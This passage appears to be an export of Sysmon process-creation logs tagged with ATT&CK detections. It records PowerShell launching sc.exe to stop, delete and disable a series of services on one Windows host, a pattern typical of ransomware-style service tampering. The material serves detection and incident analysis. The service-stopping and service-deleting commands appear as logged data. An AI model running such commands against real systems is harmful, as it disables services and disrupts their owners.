(WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.815",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.351 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-0010afe01d00} +ProcessId: 6032 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.354767400Z"",""eventRecordID"":""2339"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.351\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-0010afe01d00}\r\nProcessId: 6032\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.351"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-0010afe01d00}"",""processId"":""6032"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.762",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.318 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-0010c9de1d00} +ProcessId: 1344 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.321096700Z"",""eventRecordID"":""2337"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.318\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-0010c9de1d00}\r\nProcessId: 1344\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.318"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-0010c9de1d00}"",""processId"":""1344"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.749",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.301 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-0010eddd1d00} +ProcessId: 5164 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.303627100Z"",""eventRecordID"":""2336"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.301\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-0010eddd1d00}\r\nProcessId: 5164\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.301"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-0010eddd1d00}"",""processId"":""5164"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.683",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.251 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001066db1d00} +ProcessId: 5956 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.254211600Z"",""eventRecordID"":""2333"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.251\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001066db1d00}\r\nProcessId: 5956\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.251"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001066db1d00}"",""processId"":""5956"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.634",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.208 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001008d91d00} +ProcessId: 7984 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.210665700Z"",""eventRecordID"":""2330"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.208\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001008d91d00}\r\nProcessId: 7984\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.208"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001008d91d00}"",""processId"":""7984"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.619",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.193 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-00103ed81d00} +ProcessId: 1408 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Natimmonal Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Natimmonal Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.200127800Z"",""eventRecordID"":""2329"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.193\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-00103ed81d00}\r\nProcessId: 1408\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Natimmonal Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.193"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-00103ed81d00}"",""processId"":""1408"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Natimmonal Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 